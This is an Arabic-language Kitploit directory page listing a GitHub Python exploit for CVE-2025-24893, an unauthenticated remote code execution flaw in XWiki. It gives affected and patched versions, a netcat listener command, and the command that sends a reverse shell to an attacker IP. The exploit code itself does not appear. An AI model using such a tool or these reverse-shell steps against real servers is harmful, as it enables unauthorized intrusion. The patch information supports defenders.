Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
أدوات/GitHubGitHub/hasecto/cve-2025-24893
توليد الحمولةتحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالتعلم والتعليم
GitHubhasecto/cve-2025-24893

CVE-2025-24893

استغلال تنفيذ الكود عن بُعد (RCE) في XWiki

عرض المستودع
منذ 3 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2025-24893

استغلال تنفيذ الكود عن بُعد (RCE) في XWiki

أداة استغلال بلغة Python3 للثغرة CVE-2025-24893، وهي ثغرة حرجة لتنفيذ الكود عن بُعد غير مصادق عليه (RCE) تؤثر على منصة XWiki.

يستغل هذا السكريبت ثغرة إدخال كود/تعبير (CWE-95) داخل مكون الماكرو SolrSearch. تسمح الثغرة للمهاجمين بتنفيذ كود Groovy/Java عشوائي على نظام التشغيل الأساسي. يقوم الأداة تلقائيًا بترميز Base64 لتجاوز قيود تفسير الأوامر لوظيفة Runtime.getRuntime().exec() في Java.

📊 تفاصيل الثغرة

  • CVE ID: CVE-2025-24893
  • درجة CVSS: 9.8 حرجة (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)
  • CWE: CWE-95 (فشل في تحييد تعبير لغة التعبير / حقن التقييم)
  • المكون المستهدف: /bin/get/Main/SolrSearch (عبر الوسيط text)

🔍 الإصدارات المتأثرة

  • جميع الإصدارات بدءًا من 5.3-milestone-2 حتى 15.10.10
  • الإصدارات 16.0.0-rc-1 حتى 16.4.0

🚀 كيفية الاستخدام

1. ابدأ المستمع (Netcat) في Kali Linux:

root@kitploit:~
nc -lvnp 4444

2. شغّل الأداة:

root@kitploit:~
python3 CVE-2025-24-893.py <الهدف_URL> <عنوان_IP_الشبكة_الخاصة> <المنفذ>

مثال:

root@kitploit:~
python3 CVE-2025-24-893.py http://domain.local 10.10.14.229 4444

🛠️ المتطلبات

  • Python 3.x
  • مكتبة requests

لتثبيت التبعية المطلوبة:

root@kitploit:~
pip install requests

🛡️ الإصلاح

قم بتحديث نسخة XWiki الخاصة بك إلى إحدى الإصدارات الرسمية المُصحَّحة: 15.10.11، 16.4.1، 16.5.0-rc-1 (أو أحدث).

⚠️ إخلاء مسؤولية (Disclaimer)

تم تطوير هذا السكريبت للأغراض التعليمية فقط، ولتدقيقات الأمان المصرح بها، واختبارات الاختراق (Pentest). لا يتحمل المؤلف أي مسؤولية عن أي استخدام غير مناسب، أو أضرار، أو أنشطة غير قانونية ناتجة عن استخدام هذه الأداة. استخدام هذا السكريبت ضد أهداف دون إذن مسبق يعتبر غير قانوني تمامًا.

تنزيل الأداة